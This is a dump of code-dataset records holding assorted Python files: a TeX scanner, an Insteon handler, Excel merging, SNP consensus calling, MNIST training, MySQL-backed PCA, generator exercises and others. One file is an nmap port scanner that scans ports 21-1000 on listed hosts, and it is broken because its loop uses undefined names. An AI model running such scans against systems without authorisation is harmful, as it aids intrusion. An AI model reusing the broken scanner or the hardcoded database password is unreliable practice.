Char = String[Index]\n Index = Index + 1\n if (Char != \" \") : \n Word = Word + Char\n Escaped = (Char == '\\\\')\n break\n \n # See if we found anything. If not, quit now.\n \n if (Word != \"\") :\n \n # If the word started with a { or [, then we ignore blanks and\n # keep going until we hit the corresponding closing character\n # (or the end of the string). 
Allow for nesting.\n \n if (Char == \"{\" or Char == \"[\") :\n Start = Char\n if (Start == \"{\") : End = \"}\"\n if (Start == \"[\") : End = \"]\"\n Nesting = 1\n while (Index < len(String)) :\n Char = String[Index]\n Index = Index + 1\n if (Char == \"\") : break\n Word = Word + Char\n if ((Char == Start) and not Escaped) : Nesting = Nesting + 1\n if ((Char == End) and not Escaped) :\n Nesting = Nesting - 1\n if (Nesting <= 0) : break\n Escaped = (Char == '\\\\')\n \n else :\n\n # Otherwise, just keep going until we hit a blank or one of\n # the delimiting braces. Either of these will terminate the word,\n\n while (Index < len(String)) :\n Char = String[Index]\n if (Char == \" \") : break\n if ((Char == \"{\" or Char == \"[\") and not Escaped) : break\n Index = Index + 1\n Word = Word + Char\n Escaped = (Char == '\\\\')\n\n if (Word == \"\") : Index = 0\n \n return (Word,Index)\n\n def GetNextTexCommandFromString(self,\\\n String,Callback,ClientData,ClientExtra) :\n \n # This is similar to GetNextTexCommand(), except that it works not on\n # a file but on a string, and it works recursively, calling itself\n # to search the arguments of any command to see if they themselves\n # contain more commands. Each time a command is found, the specified\n # callback routine is called with the command details and the client\n # arguments, just as for GetNextTexCommand(). Callback can be passed\n # as None, in which case no callback is made - this can be used for a\n # quick check that the file can be parsed.\n \n Posn = 0\n More = True\n while (More) :\n Directive = \"\"\n Command = []\n\n # Apart from the recursion, this code follows the general lines of\n # GetNextTexCommand().\n\n while (True) :\n WordPair = self.GetNextWordFromString(String,Posn)\n Word = WordPair[0]\n Posn = WordPair[1]\n if (Word == \"\") : break\n if (Word[0] == '[' or Word[0] == '{') :\n self.GetNextTexCommandFromString(Word[1:len(Word) - 1],\\\n Callback,ClientData,ClientExtra)\n BSlashIndex = Word.find('\\\\')\n if (BSlashIndex >= 0) :\n Directive = Word[BSlashIndex:]\n break\n More = False\n if (Directive != \"\") :\n Command.append(Directive)\n WordPair = self.GetNextWordFromString(String,Posn)\n Word = WordPair[0]\n Posn = WordPair[1]\n if (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n self.GetNextTexCommandFromString(Word[1:len(Word) - 1],\\\n Callback,ClientData,ClientExtra)\n while (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n Command.append(Word)\n WordPair = self.GetNextWordFromString(String,Posn)\n Word = WordPair[0]\n Posn = WordPair[1]\n if (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n self.GetNextTexCommandFromString(Word[1:len(Word) - 1],\\\n Callback,ClientData,ClientExtra)\n More = False\n if (String[Posn:].strip(\" \\\\r\\\\n\") != \"\") : More = True\n else :\n More = True\n break\n if (Callback != None) : Callback(Command,ClientData,ClientExtra)\n \n","sub_path":"Author_Template/TexScanner.py","file_name":"TexScanner.py","file_ext":"py","file_size_in_byte":19636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"310330430","text":"\"\"\"Manage outbound ON command to a device.\"\"\"\nimport asyncio\n\nfrom .. import ack_handler, status_handler\nfrom ... 
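A small driver for the TexScanner class above, relying only on the behaviour its docstrings promise: `SetFile()` takes an already-open file object, `GetNextTexCommand()` fires the callback once per LaTeX command found and returns True at end of file, and `ParsedOK()`/`GetReport()` expose any parsing problems. The callback here simply collects `\cite`-style directives and their arguments; this is a sketch, not part of the original file.

```python
def collect_citations(command, found, _extra):
    # command[0] is the directive (starting with '\'); the rest are its arguments.
    if command and command[0].startswith('\\cite'):
        found.append(command)

def scan_tex_file(path):
    scanner = TexScanner()
    found = []
    with open(path) as tex_file:
        scanner.SetFile(tex_file)
        while not scanner.GetNextTexCommand(collect_citations, found, None):
            pass
    if not scanner.ParsedOK():
        print('\n'.join(scanner.GetReport()))
    return found
```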
import pub\nfrom ...constants import MessageFlagType, ResponseStatus\nfrom ...topics import STATUS_REQUEST\nfrom .direct_command import DirectCommandHandlerBase\n\n\nclass StatusRequestCommand(DirectCommandHandlerBase):\n \"\"\"Manage an outbound Status command to a device.\"\"\"\n\n def __init__(self, address, status_type: int = 0):\n \"\"\"Init the OnLevelCommand class.\"\"\"\n super().__init__(topic=STATUS_REQUEST, address=address, group=None)\n self._status_type = status_type\n self._subscriber_topic = f\"handler.{self._address.id}.{self._status_type}.{STATUS_REQUEST}.{str(MessageFlagType.DIRECT).lower()}\"\n\n # pylint: disable=arguments-differ, useless-super-delegation\n async def async_send(self):\n \"\"\"Send the ON command async.\"\"\"\n return await super().async_send(status_type=self._status_type)\n\n @ack_handler\n async def async_handle_ack(self, cmd1, cmd2, user_data):\n \"\"\"Handle the message ACK.\"\"\"\n if cmd2 == self._status_type:\n await super().async_handle_ack(cmd1=cmd1, cmd2=cmd2, user_data=user_data)\n\n @status_handler\n async def async_handle_direct_ack(self, topic=pub.AUTO_TOPIC, **kwargs):\n \"\"\"Handle the Status Request response direct ACK.\n\n This handler listens to all topics for a device therefore we need to\n confirm the message is a status response.\n \"\"\"\n # Need to make sure the ACK has time to aquire the lock\n await asyncio.sleep(0.06)\n if not self._response_lock.locked():\n return\n\n msg_type = topic.name.split(\".\")[-1]\n if msg_type != str(MessageFlagType.DIRECT_ACK):\n return\n\n self._direct_response.put_nowait(ResponseStatus.SUCCESS)\n\n cmd1 = kwargs.get(\"cmd1\")\n cmd2 = kwargs.get(\"cmd2\")\n self._call_subscribers(db_version=cmd1, status=cmd2)\n","sub_path":"pyinsteon/handlers/to_device/status_request.py","file_name":"status_request.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"586683224","text":"import openpyxl\nwb=openpyxl.load_workbook('各年业绩表.xlsx')\nnwb=openpyxl.Workbook()\nnws=nwb.active\nnws.append(['年份','月份','金额'])\nfor ws in wb.worksheets:\n l=list(ws.values)[1:-1]\n for v in l:\n nws.append((ws.title,)+v)\nnwb.save('合并2.xlsx')","sub_path":"Excel/openpyxl/zeng-demo/1.16 实例应用(多工作表合并到单工作表/1.16.2.py","file_name":"1.16.2.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"319856498","text":"# Author: Ana Poets\n# Description: Use a list of all the markers found in exome and gbs data combined. With header. This is the output of ConsensusRas_exome_gbs.R\n# GBS SNPs are in the top of the file. 
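The openpyxl merge script above hard-codes its header row and slices `values[1:-1]`, which silently drops both the header and a trailing (presumably summary) row from every sheet. A hedged generalisation that takes the header from the first sheet and assumes no trailing row — file names and the `label` column are illustrative:

```python
import openpyxl

def merge_sheets(src_path, dst_path, label='sheet'):
    wb = openpyxl.load_workbook(src_path)
    out = openpyxl.Workbook()
    ws_out = out.active
    header = next(wb.worksheets[0].iter_rows(values_only=True))
    ws_out.append((label,) + header)
    for ws in wb.worksheets:
        for row in list(ws.iter_rows(values_only=True))[1:]:  # skip each sheet's header
            ws_out.append((ws.title,) + row)
    out.save(dst_path)
```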
Choose the GBS data all times, only when GBS is NA then look at the call in the exome\n# Format of input file: \n# \n# Exome[, which(names(Exome) == \"Rusmusson\")]\n#chr7H_part1_45\tGG\n#chr7H_part1_63\tCC\n#chr7H_part1_94\tCC\n#chr7H_part1_112\tGG\n#chr7H_part1_131\tAA\n#chr7H_part1_145\tGG\n#chr7H_part1_168\tCC\n#chr7H_part1_185\tAA\n#chr7H_part1_192\tGG\n\n\nINPUT=open(\"Rasmusson_gbs_then_exome.txt\",'r')\n#INPUT.seek(0)\n\nOUTPUT=open(\"ConsensusRas_gbs_exome.txt\",\"a\")\n\n\n\n#Read file header\nINPUT.readline()\n\n# Create a dictionary for each SNP present in both exome and gbs data\nyears_dict ={}\nfor line in INPUT:\n item=line.strip('\\n').split('\\t')\n if item[0] in years_dict:\n years_dict[item[0]].append(item[1])\n else:\n years_dict[item[0]] = [item[1]]\n\n\n# Convert dict to a list so we can investigate those SNPs with multiple hits\n#lists\ntemp = []\ndictList = []\n\nfor key,value in years_dict.iteritems():\n\t#print (key + value)\n temp= [key,value]\n dictList.append(temp)\n \nCountDouble=0\nCountTriple=0\nSNPconsensus=[]\nfor SNP in dictList:\n # if there is only one value\n if len(SNP[1]) == 1:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n # if there are two values for the same SNP\n if len(SNP[1]) ==2:\n CountDouble=CountDouble+1\n if SNP[1][0] == 'NA' and SNP[1][1] == 'NA':\n SNPconsensus.append((SNP[0],\"NA\"))\n else:\n if SNP[1][0] == SNP[1][1]:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n else:\n if SNP[1][0] == \"NA\":\n SNPconsensus.append((SNP[0],SNP[1][1]))\n if SNP[1][1] == \"NA\":\n SNPconsensus.append((SNP[0],SNP[1][0]))\n #If the calls are different but are not NA, use the call from GBS\n #if SNP[1][0] != \"NA\" and SNP[1][1] != \"NA\" and SNP[1][0] != SNP[1][1]:\n if SNP[1][0] != \"NA\" and SNP[1][1] != \"NA\" and SNP[1][0] != SNP[1][1]:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n #If there are thres values for the Same SNP\n if len(SNP[1])==3:\n CountTriple=CountTriple+1\n NApresent=SNP[1].count('NA')\n # evaluate how many sites are NA. If two sites are NA, choose the genotype in the third site as the call. 
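The grouping step above (one list of genotype calls per SNP id) can be written with `collections.defaultdict`, which removes the explicit membership test. Input lines are tab-separated `<snp_id>\t<call>` pairs, as in the script; a sketch:

```python
from collections import defaultdict

def group_calls(lines):
    calls = defaultdict(list)
    for line in lines:
        snp_id, call = line.rstrip('\n').split('\t')
        calls[snp_id].append(call)
    return calls

assert group_calls(['s1\tGG', 's1\tNA', 's2\tCC']) == {'s1': ['GG', 'NA'], 's2': ['CC']}
```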
If one site is NA evaluate if the other two sites\n # are the same, if so choose either one, otherwise set to NA.\n if NApresent == 3:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n if NApresent == 2:\n matches=(list(SNP[1]))\n for i in matches:\n if i !='NA':\n SNPcall=SNP[0],i\n SNPconsensus.append(SNPcall)\n if NApresent == 1:\n have_value =(list(SNP[1]))\n Genotypes=[]\n for j in have_value:\n if j != 'NA':\n Genotypes.append(j)\n if Genotypes[0] == Genotypes[1]:\n SNPconsensus.append((SNP[0],Genotypes[1]))\n else:\n SNPconsensus.append((SNP[0],\"NA\"))\n if NApresent ==0:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n #if SNP[1][0] == SNP[1][1] and SNP[1][1] == SNP[1][2]:\n # SNPconsensus.append((SNP[0],SNP[1][0]))\n #else:\n # SNPconsensus.append((SNP[0],\"NA\"))\n\nfor i in SNPconsensus:\n print >> OUTPUT, i[0],i[1]\n\nINPUT.close()\nOUTPUT.close()\n\n\n\n\n\n\n\n\n","sub_path":"Analysis/2_Ras_consensus/Step2_ConsensusRas_gbs_exome_merge.py","file_name":"Step2_ConsensusRas_gbs_exome_merge.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"217845613","text":"import torch\n\nfrom horcorr import HorCorrFunction\n\ndef profile():\n batch = 8\n height = 128\n width = 256\n n_windows = 64\n dim = 128\n\n device = torch.device('cuda:0')\n inp0 = torch.empty((batch, dim, height, width + n_windows - 1), dtype=torch.float32, device=device)\n inp1 = torch.empty((batch, dim, height, width), dtype=torch.float32, device=device)\n\n inp0.uniform_()\n inp1.uniform_()\n\n inp0.requires_grad_()\n inp1.requires_grad_()\n\n corr = HorCorrFunction.apply(inp0, inp1)\n corr.sum().backward()\n\n inp0.grad.data.cpu()\n inp1.grad.data.cpu()\n\n torch.cuda.profiler.cudart().cudaProfilerStop()\n\nif __name__ == '__main__':\n profile()","sub_path":"profile/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"295981396","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport numpy as np\nimport roslib\nroslib.load_manifest('begineer_tutorial')\nimport sys\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nclass image_converter:\n\n def __init__(self):\n \n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"/camera/rgb/image_color\",Image,self.callback)\n\n def callback(self,data):\n \n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n \n\n image = cv2.cvtColor(cv_image , cv2.COLOR_BGR2HSV)\n lower_range = np.array([30,150,50])\n upper_range = np.array([255,255,180])\n mask = cv2.inRange(image , lower_range, upper_range)\n res = cv2.bitwise_and(cv_image, cv_image, mask=mask)\n cv2.imshow(\"Image window\", res) \n # print(res)\n\n\n #cv2.imshow(\"Image window\", cv_image)\n cv2.waitKey()\n\n \n\ndef main(args):\n ic = image_converter()\n rospy.init_node('image_converter', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)","sub_path":"node1.py","file_name":"node1.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"200560357","text":"import nmap\n\ndef write_to_file(host,result):\n name = \"%s.txt\"%(host)\n file = open(name,'w')\n file.write(result)\n 
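The branch ladder above reduces to a handful of rules per SNP: all-NA gives NA; a single non-missing call (or unanimous non-missing calls) wins; one NA plus two disagreeing calls gives NA; and any remaining conflict falls back to the first call, which is the GBS call since GBS SNPs sit first in the merged file. A compact helper equivalent under those rules:

```python
def consensus_call(calls):
    """Consensus genotype for one SNP from 1-3 calls, GBS call listed first."""
    present = [c for c in calls if c != 'NA']
    if not present:
        return 'NA'
    if len(present) == 1 or len(set(present)) == 1:
        return present[0]
    if len(calls) == 3 and len(present) == 2:
        return 'NA'              # one NA plus two disagreeing calls
    return calls[0]              # unresolved conflict: prefer the GBS call

assert consensus_call(['GG', 'NA']) == 'GG'
assert consensus_call(['NA', 'GG', 'CC']) == 'NA'
assert consensus_call(['GG', 'CC']) == 'GG'
```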
file.close()\nfor host in hosts:\n nm.scan(host,'21-1000')\n res = \"Host : %s\" %host + '\\n' + \"State : %s\" %nm[host].state() + '\\n'+ \"info : %s\" %nm.scaninfo()\n write_to_file(host,res)\n\ndef port_scanner():\n file = open('hosts.txt','r')\n hosts = file.read()\n hosts = hosts.split('\\n')\n\n nm = nmap.PortScanner()\n \ndef main():\n port_scanner()\n\nmain()\n","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"479509192","text":"from __future__ import print_function\nimport time, sys\nimport numpy as np\nfrom src.utils import *\nfrom src.read_mnist import read_train_dev_mnist\n\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport torchvision.datasets as datasets\n\nnp.random.seed(1337) # for reproducibility\n\n## ---------------------------------------------------------------------------------------------------------------------\n# read data\nx_train, y_train, x_dev, y_dev = read_train_dev_mnist()\n\nprint(' x_train: %s' % str(x_train.shape))\nprint(' x_dev: %s' % str(x_dev.shape))\n\n## ---------------------------------------------------------------------------------------------------------------------\n# train config\nn_epochs = 100\nbatch_size = 300\n\n## ---------------------------------------------------------------------------------------------------------------------\n# net dims\ninput_dim = x_train.shape[1]\noutput_dim = y_train.shape[1]\n\nprint(' input_dim: %d' % input_dim)\nprint(' output_dim: %d' % output_dim)\ny_train = np.argmax(y_train, axis=1)\ny_dev = np.argmax(y_dev, axis=1)\n\n# --------------------\n\nfrom dataset import Dataset\nimport torch.utils.data as data\ntrainset = Dataset(x_train, y_train)\ntrainloader = data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=6)\n\n\n# --------------------\nfrom net import Net\nnet = Net(input_dim, output_dim)\n\n## ---------------------------------------------------------------------------------------------------------------------\n# train\ncprint('c','\\nTrain MNIST:')\ncost_train = np.zeros(n_epochs)\ncost_dev = np.zeros(n_epochs)\nerr_dev = np.zeros(n_epochs)\n\nnb_samples_train = x_train.shape[0]\nnb_samples_dev = x_dev.shape[0]\n\nbest_cost = np.inf\n\nfor i in range(n_epochs):\n net.set_mode_train(True)\n # ---- W\n tic = time.time()\n for x, y in trainloader:\n loss = net.fit(x, y)\n cost_train[i] += loss / float(nb_samples_train) * float(len(x))\n\n # for ind in generate_ind_batch(nb_samples_train, batch_size):\n # loss = net.fit(x_train[ind], y_train[ind])\n # cost_train[i] += loss / float(nb_samples_train) * float(len(ind))\n\n toc = time.time()\n\n # ---- print\n print(\"it %d/%d, Jtr = %f, \" % (i, n_epochs, cost_train[i]), end=\"\")\n cprint('r',' time: %f seconds\\n' % (toc - tic))\n sys.stdout.flush()\n\n # ---- dev\n if i % 5 == 0:\n net.set_mode_train(False)\n for ind in generate_ind_batch(nb_samples_dev, batch_size, random=True):\n cost, err = net.eval(x_dev[ind], y_dev[ind])\n cost_dev[i] += cost / float(nb_samples_dev) * float(len(ind))\n err_dev[i] += err / float(nb_samples_dev)\n cprint('g',' Jdev = %f, err = %f\\n' % (cost_dev[i], err_dev[i]))\n if cost_dev[i] < best_cost:\n best_cost = cost_dev[i]\n net.save('model/theta_best')\n\n## ---------------------------------------------------------------------------------------------------------------------\n# save 
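The port scanner above references `hosts` and `nm` before they exist: the scan loop sits at module level while the setup lives inside `port_scanner()`, which is defined later and builds but never uses them. A reordered sketch with the loop inside the function, using only documented python-nmap calls (`PortScanner.scan`, `nm[host].state()`, `nm.scaninfo()`):

```python
import nmap

def write_to_file(host, result):
    with open('%s.txt' % host, 'w') as f:
        f.write(result)

def port_scanner(host_file='hosts.txt'):
    with open(host_file) as f:
        hosts = [h for h in f.read().split('\n') if h]
    nm = nmap.PortScanner()
    for host in hosts:
        nm.scan(host, '21-1000')
        res = ('Host : %s\n' % host
               + 'State : %s\n' % nm[host].state()
               + 'info : %s' % nm.scaninfo())
        write_to_file(host, res)

if __name__ == '__main__':
    port_scanner()
```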
model\nnet.save('model/theta_last')\n\n## ---------------------------------------------------------------------------------------------------------------------\n# fig cost vs its\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nplt.figure()\nplt.plot(cost_train, 'r')\nplt.plot(range(0, n_epochs, 5), cost_dev[::5], 'bo--')\nplt.ylabel('J')\nplt.xlabel('it')\nplt.grid(True)\n# plt.show(block=False)\nplt.savefig('train_cost.png')\n","sub_path":"1_mnist/4_example_mlp_batchnorm_class_based_dataloader/run1_train.py","file_name":"run1_train.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"554099888","text":"# 고위함수\n# - 함수를 인수로 받거나, 함수를 결과로 반환하는 함수를 고위 함수 라고 한다\n# - map, sorted 등등\n\nfruits = ['strawberry', 'fig', 'apple', 'cherry', 'raspberry', 'banana']\na = sorted(fruits, key=len) # len 함수를 key의 인자로 전달한다\nprint(a)\n\n\ndef reverse(word):\n return word[::-1]\n\n\n# 단어 처라를 거꾸로 해서 정렬\na = sorted(fruits, key=reverse)\nprint(a)\n\n\n# - map(), reduce(), filter(), apply() 등의 고위 함수가 널리 알려져 있다\n# - apply()는 파이썬 2.3.에서 중단 3에서는 제거\n# - map, reduce, filter는 여전히 존재하지만 대부분의 경우 더 나은 다른 방법이 있다\n\n\n# Map, Filter, Reduce의 대안\n# - 지능형 리스트와 제너레이터 표현식이 소개된 후에는 이 함수들의 중요성이 떨어졌다\n# - 지능형 리스트나 제너레이터 표현식이 map과 filter의 조합이 처리하는 작업을 표현할 수 있을 뿐만 아니라 가독성이 더 좋기 때문\n\ndef factorial(n):\n '''returns n!'''\n return 1 if n < 2 else n * factorial(n - 1)\n\n\nlist(map(factorial, range(6))) # 함수형\n[factorial(n) for n in range(6)] # 제너레이터 표현식\n\nlist(map(factorial, filter(lambda n: n % 2, range(6)))) # 함수형\n[factorial(n) for n in range(6) if n % 2] # 제너레이터 표현식\n\n# - 파이썬3에서 map, filter는 제너레이터(일종의 반복 가능 객체)를 반환하므로, 제너레이터 표현식이 이 함수들을 직접 대체한다\n# - 내장 되어 있던 reduce는 functools 모듈로 떨어져 나왔다. 
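The dev-set evaluation in the training script above batches indices by hand with `generate_ind_batch()`, while training already goes through a `Dataset`/`DataLoader`. The same pattern could serve both splits; a hedged sketch, assuming the custom `Dataset` class from `dataset.py` accepts `(inputs, labels)` exactly as in the training setup:

```python
import torch.utils.data as data

devset = Dataset(x_dev, y_dev)
devloader = data.DataLoader(devset, batch_size=batch_size,
                            shuffle=False, num_workers=6)

# for x, y in devloader:          # assumes net.eval() accepts batched tensors
#     cost, err = net.eval(x, y)
```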
reduce는 주로 합계를 구할때 사용 하는데 내장 함수 sum()이 더 좋다\n\nfrom functools import reduce\nfrom operator import add\n\nreduce(add, range(100))\nsum(range(100)) # 함수를 임포트하거나 추가할 필요 없다\n# - sum과 reduce는 연속된 항목에 어떤 연산을 적용해서, 이전 결과를 나주거시키면서 일련의 값을 하나의 값으로 리덕션 한다는 공통점이 있다\n\n# - 내장된 reduction 함수\n# - all(iterable)\n# - any(iterable)","sub_path":"05_First_Class/02_HIgh-order_function.py","file_name":"02_HIgh-order_function.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"652905517","text":"import mysql.connector\nimport csv\nimport numpy as np\nfrom datetime import datetime\nimport numpy as np\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\ndef selectInDataBase(sqlConnection, select):\n cursor = sqlConnection.cursor()\n cursor.execute (select)\n fields = map(lambda x:x[0], cursor.description)\n fields=[]\n for x in cursor.description:\n fields.append(x[0])\n ret=[]\n for data in cursor.fetchall():\n line={}\n for i in range(len(fields)):\n line[fields[i]]=data[i]\n ret.append(line)\n return ret\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"123456\",\n database=\"elo7_datascience\",\n get_warnings=False,\n raise_on_warnings=False\n)\n\nidUser=61\nsql=\"\"\"SELECT gs.valuesdata as valuesdata, gs.idmovie as idmovie FROM genome_scores_at_one_line as gs\n inner join ratings as ra on ra.idmovie=gs.idmovie\n WHERE ra.iduser = {d0};\"\"\".replace(\"\\n\",\" \").format(d0=idUser)\n\n\ngenome_scoresAtSqlSelect=selectInDataBase(mydb,sql)\n\ngenome_scores=np.zeros((len(genome_scoresAtSqlSelect),len(genome_scoresAtSqlSelect[0]['valuesdata'].split(\",\"))))\n\nconverterPostionAtGenome_scoresToIdMovie={}\nconverterIdMovieToPostionAtGenome_scores={}\nfor i in range(len(genome_scoresAtSqlSelect)):\n\n lineForGenomeScore=list(csv.reader([genome_scoresAtSqlSelect[i]['valuesdata']]))[0]\n genome_scores[i]=np.array(lineForGenomeScore,dtype=np.float)\n converterPostionAtGenome_scoresToIdMovie[i]=genome_scoresAtSqlSelect[i]['idmovie']\n converterIdMovieToPostionAtGenome_scores[genome_scoresAtSqlSelect[i]['idmovie']]=i\n\nX=genome_scores\nscaler = StandardScaler()\nscaler.fit(X)\nX=scaler.transform(X) \npca = PCA()\ncomponentsForObjects = pca.fit_transform(X)\n\nx=[[],[],[],[],[],[],[],[],[],[]]\ny=[[],[],[],[],[],[],[],[],[],[]]\n\nsql=\"\"\"SELECT rating, idmovie FROM ratings \n where iduser={d0} \"\"\".replace(\"\\n\",\" \").format(d0=idUser)\ncursor = mydb.cursor()\ncursor.execute (sql)\nfor (rating,idmovie) in cursor:\n if(idmovie in converterIdMovieToPostionAtGenome_scores ):\n position=converterIdMovieToPostionAtGenome_scores[idmovie]\n #if(rating<4.0):\n #x[0].append(componentsForObjects[position][0])\n #y[0].append(componentsForObjects[position][1])\n #else:\n #x[1].append(componentsForObjects[position][0])\n #y[1].append(componentsForObjects[position][1])\n x[int(float(rating))-1].append(componentsForObjects[position][0])\n y[int(float(rating))-1].append(componentsForObjects[position][1])\n\ncolors=[\"red\",\"green\",\"blue\",\"cyan\",\"magenta\"]\n#x=[[2.2,5.0,6.0],[2.2,5.0,6.0]]\n#y=[[1.2,5.0,6.0],[2.2,6.0,7.0]]\nfig = plt.figure()\n\nax = fig.add_subplot(1, 1, 1, axisbg=\"1.0\") \n\ncoi=0\nvolume=[70.0,70.0,70,70,70,70,70]\nalpha=[0.3,0.3,0.3,0.3,0.3]\ncoi=0\nfor i in [0,1,2,3,4]: \n ax.scatter(x[i], y[i],c=colors[coi],label=i,edgecolors='none', 
s=volume[coi], alpha=alpha[coi])\n coi=coi+1\nplt.title('Matplot scatter plot')\nplt.legend(loc=2)\nplt.show()\nprint(\"oi\")\n","sub_path":"explorationDatabase/calculatePCAOverGenomeScoresOfJustOneUser.py","file_name":"calculatePCAOverGenomeScoresOfJustOneUser.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"209242081","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFile: repair_conf.py\nAuthor: lsl\nEmail: ux_lsl@163.com\nDescription: 修复conf的配置\n\"\"\"\n\nfrom house.models import HouseConfig\nfrom house.parser import get_url_params\n\n\ndef run():\n for conf in HouseConfig.objects.all():\n lst = []\n print('修复{}的配置'.format(conf))\n for url in conf.init_urls:\n url_tpl, params, lst_xpath = get_url_params(url)\n if lst_xpath is None:\n if 'esf' in url_tpl:\n lst_xpath = '/html/body/div[4]/div[4]/div[4]'\n elif 'anjuke' in url_tpl:\n lst_xpath = '//*[@id=\"houselist-mod-new\"]'\n a = {\n 'url_tpl': url_tpl,\n 'lst_xpath': lst_xpath,\n 'params': [\n {\n 'type': 1,\n 'var_name': 'page',\n 'val': 50,\n },\n {\n 'type': 3,\n 'var_start_name': 'price_start',\n 'var_end_name': 'price_end',\n 'var_start_val': params['price_start'],\n 'var_end_val': params['price_end'],\n },\n {\n 'type': 3,\n 'var_start_name': 'area_start',\n 'var_end_name': 'area_end',\n 'var_start_val': params['area_start'],\n 'var_end_val': params['area_end'],\n }]\n }\n lst.append(a)\n conf.tpl_urls = lst\n conf.save()\n","sub_path":"demo/src/YWebAdmin/scripts/repair_conf.py","file_name":"repair_conf.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"574113542","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : hvalle <me@wsu.com>\nDate : 8/9/2021\nPurpose:\n\"\"\"\n\n\ndef fibo():\n \"\"\"Fibo series\"\"\"\n numbers = []\n while True:\n if len(numbers) < 2:\n numbers.append(1)\n else:\n numbers.append(sum(numbers))\n numbers.pop(0)\n yield numbers[-1]\n continue\n\n\ndef gen246():\n print('About to yield 2')\n yield 2\n print('About to yield 4')\n yield 4\n print('About to yield 6')\n yield 6\n print('About to return')\n\n\ndef gen123():\n yield 1\n yield 2\n yield 3\n\n\ndef first(iterable):\n iterator = iter(iterable)\n try:\n return next(iterator)\n except StopIteration:\n raise ValueError('Iterable is empty')\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Review Iterator and Generators\"\"\"\n # iterable = ['Spring', 'Summer', 'Fall', 'Winter']\n # print(type(iterator))\n # print(first(iterable))\n # print(first(iterable))\n # g = gen123()\n # print(type(g))\n for v in gen123():\n print(f'Value is {v}')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"Day1/my_generators.py","file_name":"my_generators.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"267557638","text":"import math\n\ndef independent_alleles(k, N):\n n_AaBb = int(N)\n pop = 2**k\n prob = []\n\n while n_AaBb <= pop:\n # Calculate possible orderings of genotypes\n comb = math.factorial(pop)/(math.factorial(pop-n_AaBb)*math.factorial(n_AaBb))\n # Calculate probability of occurence of a number of AaBb\n # in the total population. 
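The `first()` helper in the generator exercise above converts an empty iterable into a `ValueError` by catching `StopIteration`. The same idea can lean on `next()`'s default argument instead; a sketch:

```python
def first_or(iterable, default=None):
    """First item of `iterable`, or `default` if it is empty."""
    return next(iter(iterable), default)

assert first_or(['Spring', 'Summer']) == 'Spring'
assert first_or([]) is None
```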
Accounting for all possible arrangements.\n # Append the result to the probabilities array.\n prob.append((0.25**n_AaBb * 0.75**(pop-n_AaBb))*comb)\n # Increment the number of AaBb genotipes to calculate probabilities for\n # all the scenarios with more AaBb genotypes than the provided N argument\n n_AaBb = n_AaBb+1\n\n # Sum over the prob array to return the overall probability of having AT LEAST\n # N AaBb genotypes at the k generation\n return sum(prob)\n","sub_path":"Bioinformatics stronghold/LIA.py","file_name":"LIA.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"126950198","text":"import M_settings as settings #use PM_settings for matrices\nimport os\n\n\n# collects the names of each subject's raw data files\ndef get_files(subjid, block):\n txtfiles = [os.path.join(settings.rawfiles_dir, f) for f in os.listdir(settings.rawfiles_dir)\n if os.path.isfile(os.path.join(settings.rawfiles_dir, f)) and '.txt' in f\n and block in f and str(subjid) in f]\n\n 